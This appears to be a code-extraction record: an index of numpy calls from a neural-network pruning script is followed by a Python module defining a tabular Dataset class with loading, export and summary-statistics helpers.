True, 'import numpy as np\n'), ((6169, 6218), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (6182, 6218), True, 'import numpy as np\n'), ((6231, 6264), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (6241, 6264), True, 'import numpy as np\n'), ((6327, 6381), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (6334, 6381), True, 'import numpy as np\n'), ((6399, 6453), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (6406, 6453), True, 'import numpy as np\n'), ((6471, 6525), 'numpy.tile', 'np.tile', 
(['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (6478, 6525), True, 'import numpy as np\n'), ((7198, 7236), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (7208, 7236), True, 'import numpy as np\n'), ((8681, 8699), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (8689, 8699), True, 'import numpy as np\n'), ((8718, 8736), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (8726, 8736), True, 'import numpy as np\n'), ((8762, 8787), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (8770, 8787), True, 'import numpy as np\n'), ((13604, 13619), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (13612, 13619), True, 'import numpy as np\n'), ((13633, 13650), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (13641, 13650), True, 'import numpy as np\n'), ((13663, 13683), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (13671, 13683), True, 'import numpy as np\n'), ((13695, 13714), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13702, 13714), True, 'import numpy as np\n'), ((13804, 13819), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13812, 13819), True, 'import numpy as np\n'), ((13828, 13843), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13836, 13843), True, 'import numpy as np\n'), ((13858, 13882), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13867, 13882), True, 'import numpy as np\n'), ((13883, 13912), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (13900, 13912), True, 'import numpy as np\n'), ((13926, 13950), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13935, 13950), True, 'import numpy as np\n'), ((13951, 13980), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (13968, 13980), True, 'import numpy as np\n'), ((13994, 14018), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (14003, 14018), True, 'import numpy as np\n'), ((14019, 14048), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (14036, 14048), True, 'import numpy as np\n'), ((14116, 14156), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (14130, 14156), True, 'import numpy as np\n'), ((14259, 14308), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (14272, 14308), True, 'import numpy as np\n'), ((14321, 14354), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (14331, 14354), True, 'import numpy as np\n'), ((14417, 14471), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (14424, 14471), True, 'import numpy as np\n'), ((14489, 14543), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (14496, 14543), True, 'import numpy as np\n'), ((14561, 14615), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (14568, 14615), True, 'import numpy as np\n'), ((15288, 15326), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, 
weight_shape)\n', (15298, 15326), True, 'import numpy as np\n'), ((16771, 16789), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (16779, 16789), True, 'import numpy as np\n'), ((16808, 16826), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (16816, 16826), True, 'import numpy as np\n'), ((16852, 16877), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (16860, 16877), True, 'import numpy as np\n'), ((21694, 21709), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (21702, 21709), True, 'import numpy as np\n'), ((21723, 21740), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (21731, 21740), True, 'import numpy as np\n'), ((21753, 21773), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (21761, 21773), True, 'import numpy as np\n'), ((21785, 21804), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21792, 21804), True, 'import numpy as np\n'), ((21894, 21909), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21902, 21909), True, 'import numpy as np\n'), ((21918, 21933), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21926, 21933), True, 'import numpy as np\n'), ((21948, 21972), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (21957, 21972), True, 'import numpy as np\n'), ((21973, 22002), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (21990, 22002), True, 'import numpy as np\n'), ((22016, 22040), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22025, 22040), True, 'import numpy as np\n'), ((22041, 22070), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (22058, 22070), True, 'import numpy as np\n'), ((22084, 22108), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22093, 22108), True, 'import numpy as np\n'), ((22109, 22138), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (22126, 22138), True, 'import numpy as np\n'), ((22206, 22246), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (22220, 22246), True, 'import numpy as np\n'), ((22349, 22398), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (22362, 22398), True, 'import numpy as np\n'), ((22411, 22444), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (22421, 22444), True, 'import numpy as np\n'), ((22507, 22561), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (22514, 22561), True, 'import numpy as np\n'), ((22579, 22633), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (22586, 22633), True, 'import numpy as np\n'), ((22651, 22705), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (22658, 22705), True, 'import numpy as np\n'), ((23378, 23416), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (23388, 23416), True, 'import numpy as np\n'), ((24861, 24879), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (24869, 24879), True, 'import numpy as np\n'), ((24898, 24916), 'numpy.array', 'np.array', (['bl_means'], 
{}), '(bl_means)\n', (24906, 24916), True, 'import numpy as np\n'), ((24942, 24967), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (24950, 24967), True, 'import numpy as np\n'), ((29784, 29799), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (29792, 29799), True, 'import numpy as np\n'), ((29813, 29830), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (29821, 29830), True, 'import numpy as np\n'), ((29843, 29863), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (29851, 29863), True, 'import numpy as np\n'), ((29875, 29894), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29882, 29894), True, 'import numpy as np\n'), ((29984, 29999), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (29992, 29999), True, 'import numpy as np\n'), ((30008, 30023), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (30016, 30023), True, 'import numpy as np\n'), ((30038, 30062), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30047, 30062), True, 'import numpy as np\n'), ((30063, 30092), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (30080, 30092), True, 'import numpy as np\n'), ((30106, 30130), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30115, 30130), True, 'import numpy as np\n'), ((30131, 30160), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (30148, 30160), True, 'import numpy as np\n'), ((30174, 30198), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30183, 30198), True, 'import numpy as np\n'), ((30199, 30228), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (30216, 30228), True, 'import numpy as np\n'), ((30296, 30336), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (30310, 30336), True, 'import numpy as np\n'), ((30439, 30488), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (30452, 30488), True, 'import numpy as np\n'), ((30501, 30534), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (30511, 30534), True, 'import numpy as np\n'), ((30597, 30651), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (30604, 30651), True, 'import numpy as np\n'), ((30669, 30723), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (30676, 30723), True, 'import numpy as np\n'), ((30741, 30795), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (30748, 30795), True, 'import numpy as np\n'), ((31468, 31506), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (31478, 31506), True, 'import numpy as np\n'), ((32951, 32969), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (32959, 32969), True, 'import numpy as np\n'), ((32988, 33006), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (32996, 33006), True, 'import numpy as np\n'), ((33032, 33057), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33040, 33057), True, 'import numpy as np\n'), ((34347, 34364), 'numpy.array', 'np.array', 
(['bl_beta'], {}), '(bl_beta)\n', (34355, 34364), True, 'import numpy as np\n'), ((34380, 34398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (34388, 34398), True, 'import numpy as np\n'), ((34420, 34444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (34428, 34444), True, 'import numpy as np\n'), ((34470, 34498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (34478, 34498), True, 'import numpy as np\n'), ((35347, 35364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (35355, 35364), True, 'import numpy as np\n'), ((35380, 35398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (35388, 35398), True, 'import numpy as np\n'), ((35420, 35444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (35428, 35444), True, 'import numpy as np\n'), ((35470, 35498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (35478, 35498), True, 'import numpy as np\n'), ((36347, 36364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (36355, 36364), True, 'import numpy as np\n'), ((36380, 36398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (36388, 36398), True, 'import numpy as np\n'), ((36420, 36444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (36428, 36444), True, 'import numpy as np\n'), ((36470, 36498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (36478, 36498), True, 'import numpy as np\n'), ((37347, 37364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (37355, 37364), True, 'import numpy as np\n'), ((37380, 37398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (37388, 37398), True, 'import numpy as np\n'), ((37420, 37444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (37428, 37444), True, 'import numpy as np\n'), ((37470, 37498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (37478, 37498), True, 'import numpy as np\n'), ((38347, 38364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (38355, 38364), True, 'import numpy as np\n'), ((38380, 38398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (38388, 38398), True, 'import numpy as np\n'), ((38420, 38444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (38428, 38444), True, 'import numpy as np\n'), ((38470, 38498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (38478, 38498), True, 'import numpy as np\n'), ((5641, 5660), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5648, 5660), True, 'import numpy as np\n'), ((6090, 6129), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (6104, 6129), True, 'import numpy as np\n'), ((6130, 6152), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (6140, 6152), True, 'import numpy as np\n'), ((13731, 13750), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13738, 13750), True, 'import numpy as np\n'), ((14180, 14219), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (14194, 14219), True, 'import numpy as np\n'), ((14220, 14242), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (14230, 14242), True, 'import numpy as np\n'), ((21821, 21840), 'numpy.ones', 'np.ones', 
(['tile_shape'], {}), '(tile_shape)\n', (21828, 21840), True, 'import numpy as np\n'), ((22270, 22309), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (22284, 22309), True, 'import numpy as np\n'), ((22310, 22332), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (22320, 22332), True, 'import numpy as np\n'), ((29911, 29930), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29918, 29930), True, 'import numpy as np\n'), ((30360, 30399), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (30374, 30399), True, 'import numpy as np\n'), ((30400, 30422), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (30410, 30422), True, 'import numpy as np\n'), ((635, 650), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (643, 650), True, 'import numpy as np\n'), ((1064, 1089), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1072, 1089), True, 'import numpy as np\n'), ((5975, 6000), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (5983, 6000), True, 'import numpy as np\n'), ((8485, 8516), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (8495, 8516), True, 'import numpy as np\n'), ((8553, 8584), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (8563, 8584), True, 'import numpy as np\n'), ((8621, 8652), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (8631, 8652), True, 'import numpy as np\n'), ((8809, 8847), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (8819, 8847), True, 'import numpy as np\n'), ((8926, 8964), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (8936, 8964), True, 'import numpy as np\n'), ((9043, 9081), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (9053, 9081), True, 'import numpy as np\n'), ((9154, 9179), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9162, 9179), True, 'import numpy as np\n'), ((14065, 14090), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (14073, 14090), True, 'import numpy as np\n'), ((16575, 16606), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (16585, 16606), True, 'import numpy as np\n'), ((16643, 16674), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (16653, 16674), True, 'import numpy as np\n'), ((16711, 16742), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (16721, 16742), True, 'import numpy as np\n'), ((16899, 16937), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (16909, 16937), True, 'import numpy as np\n'), ((17016, 17054), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (17026, 17054), True, 'import numpy as np\n'), ((17133, 17171), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (17143, 17171), True, 'import numpy as np\n'), ((17244, 17269), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17252, 17269), True, 'import numpy as np\n'), 
((22155, 22180), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (22163, 22180), True, 'import numpy as np\n'), ((24665, 24696), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (24675, 24696), True, 'import numpy as np\n'), ((24733, 24764), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (24743, 24764), True, 'import numpy as np\n'), ((24801, 24832), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (24811, 24832), True, 'import numpy as np\n'), ((24989, 25027), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (24999, 25027), True, 'import numpy as np\n'), ((25106, 25144), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (25116, 25144), True, 'import numpy as np\n'), ((25223, 25261), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (25233, 25261), True, 'import numpy as np\n'), ((25334, 25359), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25342, 25359), True, 'import numpy as np\n'), ((30245, 30270), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (30253, 30270), True, 'import numpy as np\n'), ((32755, 32786), 'numpy.reshape', 'np.reshape', (['rand_map_0', '(-1, 1)'], {}), '(rand_map_0, (-1, 1))\n', (32765, 32786), True, 'import numpy as np\n'), ((32823, 32854), 'numpy.reshape', 'np.reshape', (['rand_map_1', '(-1, 1)'], {}), '(rand_map_1, (-1, 1))\n', (32833, 32854), True, 'import numpy as np\n'), ((32891, 32922), 'numpy.reshape', 'np.reshape', (['rand_map_2', '(-1, 1)'], {}), '(rand_map_2, (-1, 1))\n', (32901, 32922), True, 'import numpy as np\n'), ((33079, 33117), 'numpy.reshape', 'np.reshape', (['rand_map_0_expand', '[-1, 1]'], {}), '(rand_map_0_expand, [-1, 1])\n', (33089, 33117), True, 'import numpy as np\n'), ((33196, 33234), 'numpy.reshape', 'np.reshape', (['rand_map_1_expand', '[-1, 1]'], {}), '(rand_map_1_expand, [-1, 1])\n', (33206, 33234), True, 'import numpy as np\n'), ((33313, 33351), 'numpy.reshape', 'np.reshape', (['rand_map_2_expand', '[-1, 1]'], {}), '(rand_map_2_expand, [-1, 1])\n', (33323, 33351), True, 'import numpy as np\n'), ((33424, 33449), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33432, 33449), True, 'import numpy as np\n'), ((1109, 1134), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1117, 1134), True, 'import numpy as np\n'), ((9199, 9224), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (9207, 9224), True, 'import numpy as np\n'), ((17289, 17314), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (17297, 17314), True, 'import numpy as np\n'), ((25379, 25404), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (25387, 25404), True, 'import numpy as np\n'), ((33469, 33494), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33477, 33494), True, 'import numpy as np\n')]
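The call index above comes from a weight-conversion script that repeatedly builds random permutation maps over weight tiles, recovers pruned positions through mask logic, and expands the maps across the full weight matrix (np.arange + np.random.shuffle, np.logical_not/logical_and/argsort/logical_or, np.tile, np.reshape). The following is a minimal sketch of that recurring pattern, not the original script: the shapes and the random stand-in mask are illustrative, and the recorded np.tile calls use "/" where an integral repeat count is required, so the sketch uses "//".

import numpy as np

weight_shape = (256, 64)   # illustrative; the real script takes this from the loaded layer
tile_shape = (64, 64)      # illustrative; tile_shape[0] must divide weight_shape[0]

pruning_mask = np.random.rand(*tile_shape) > 0.5   # stand-in for the stored bl_pruning_mask
init_mask = np.ones(tile_shape)

# One per-tile random permutation (the index records three of these: rand_map_0/1/2).
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)

# Recover positions the shuffle moved out of the pruned set, mapped back via argsort.
pruning_mask_recover = np.logical_and(np.logical_not(pruning_mask[rand_map_0]),
                                       init_mask)[np.argsort(rand_map_0)]
init_mask = np.reshape(np.logical_or(pruning_mask, pruning_mask_recover), tile_shape)

# Expand the per-tile permutation across the whole weight matrix, then flatten to a column.
rand_map_0_expand = np.tile(rand_map_0, [weight_shape[0] // tile_shape[0]])
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1, 1])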
import pandas as pd
import numpy as np
from src.si.util.util import label_gen

__all__ = ['Dataset']


class Dataset:
    def __init__(self, X=None, Y=None, xnames: list = None, yname: str = None):
        """Tabular Dataset"""
        if X is None:
            raise Exception("Trying to instantiate a DataSet without any data")
        self.X = X
        self.Y = Y
        self.xnames = xnames if xnames else label_gen(X.shape[1])
        self.yname = yname if yname else 'Y'

    @classmethod
    def from_data(cls, filename, sep=",", labeled=True):
        """Creates a DataSet from a data file.

        :param filename: The filename
        :type filename: str
        :param sep: attributes separator, defaults to ","
        :type sep: str, optional
        :param labeled: whether the last column holds the labels, defaults to True
        :type labeled: bool, optional
        :return: A DataSet object
        :rtype: DataSet
        """
        data = np.genfromtxt(filename, delimiter=sep)
        if labeled:
            X = data[:, 0:-1]
            Y = data[:, -1]
        else:
            X = data
            Y = None
        return cls(X, Y)

    @classmethod
    def from_dataframe(cls, df, ylabel=None):
        """Creates a DataSet from a pandas dataframe.

        :param df: the source dataframe
        :type df: pandas.DataFrame
        :param ylabel: name of the label column, defaults to None
        :type ylabel: str, optional
        :return: A DataSet object
        :rtype: DataSet
        """
        if ylabel and ylabel in df.columns:
            X = df.loc[:, df.columns != ylabel].to_numpy()  # convert to a numpy array
            Y = df.loc[:, ylabel].to_numpy()
            # xnames = df.columns.tolist().remove(ylabel)
            yname = ylabel
            xnames = df.columns.tolist()
            for name in xnames:
                if name == yname:
                    xnames.remove(yname)
        else:
            X = df.to_numpy()
            Y = None
            xnames = df.columns.tolist()
            yname = None
        return cls(X, Y, xnames, yname)

    def __len__(self):
        """Returns the number of data points."""
        return self.X.shape[0]

    def hasLabel(self):
        """Returns True if the dataset contains labels (a dependent variable)."""
        return self.Y is not None

    def getNumFeatures(self):
        """Returns the number of features."""
        return self.X.shape[1]

    def getNumClasses(self):
        """Returns the number of label classes or 0 if the dataset has no dependent variable."""
        return len(np.unique(self.Y)) if self.hasLabel() else 0

    def writeDataset(self, filename, sep=","):
        """Saves the dataset to a file.

        :param filename: The output file path
        :type filename: str
        :param sep: The fields separator, defaults to ","
        :type sep: str, optional
        """
        fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))
        np.savetxt(filename, fullds, delimiter=sep)

    def toDataframe(self):
        """Converts the dataset into a pandas DataFrame."""
        if self.hasLabel():
            df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))),
                              columns=self.xnames[:] + [self.yname])
            # columns=np.hstack((self.xnames, self.yname))
        else:
            df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])
        return df

    def getXy(self):
        return self.X, self.Y


def summary(dataset, format='df'):
    """Returns the statistics of a dataset (mean, var, max, min).

    :param dataset: A Dataset object
    :type dataset: si.data.Dataset
    :param format: Output format ('df': DataFrame, 'dict': dictionary), defaults to 'df'
    :type format: str, optional
    """
    if format not in ["df", "dict"]:
        raise Exception("Invalid format. Choose between 'df' and 'dict'.")
    if dataset.hasLabel():
        data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))
        # data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])
        columns = dataset.xnames[:] + [dataset.yname]
    else:
        data = dataset.X
        columns = dataset.xnames[:]
    stats = {}
    # Only inspect Y when labels exist; string labels cannot be averaged, so the label
    # column is skipped in that case.
    if dataset.hasLabel() and type(dataset.Y[0]) is str:
        for i in range(data.shape[1] - 1):  # iterate over the feature columns (skip the label)
            _means = np.mean(data[:, i], axis=0)
            _vars = np.var(data[:, i], axis=0)
            _maxs = np.max(data[:, i], axis=0)
            _mins = np.min(data[:, i], axis=0)
            stat = {"mean": _means,
                    "var": _vars,
                    "max": _maxs,
                    "min": _mins}
            stats[columns[i]] = stat
    else:
        for i in range(data.shape[1]):  # iterate over all columns
            _means = np.mean(data[:, i], axis=0)
            _vars = np.var(data[:, i], axis=0)
            _maxs = np.max(data[:, i], axis=0)
            _mins = np.min(data[:, i], axis=0)
            stat = {"mean": _means,
                    "var": _vars,
                    "max": _maxs,
                    "min": _mins}
            stats[columns[i]] = stat
    # _means = np.mean(data, axis=0)
    # _vars = np.var(data, axis=0)
    # _maxs = np.max(data, axis=0)
    # _mins = np.min(data, axis=0)
    # stats = {}
    # for i in range(data.shape[1]):
    #     stat = {"mean": _means[i],
    #             "var": _vars[i],
    #             "max": _maxs[i],
    #             "min": _mins[i]}
    #     stats[columns[i]] = stat
    if format == "dict":
        return stats
    else:
        return pd.DataFrame(stats)
[ "src.si.util.util.label_gen", "numpy.mean", "numpy.unique", "numpy.max", "numpy.savetxt", "numpy.min", "pandas.DataFrame", "numpy.genfromtxt", "numpy.var" ]
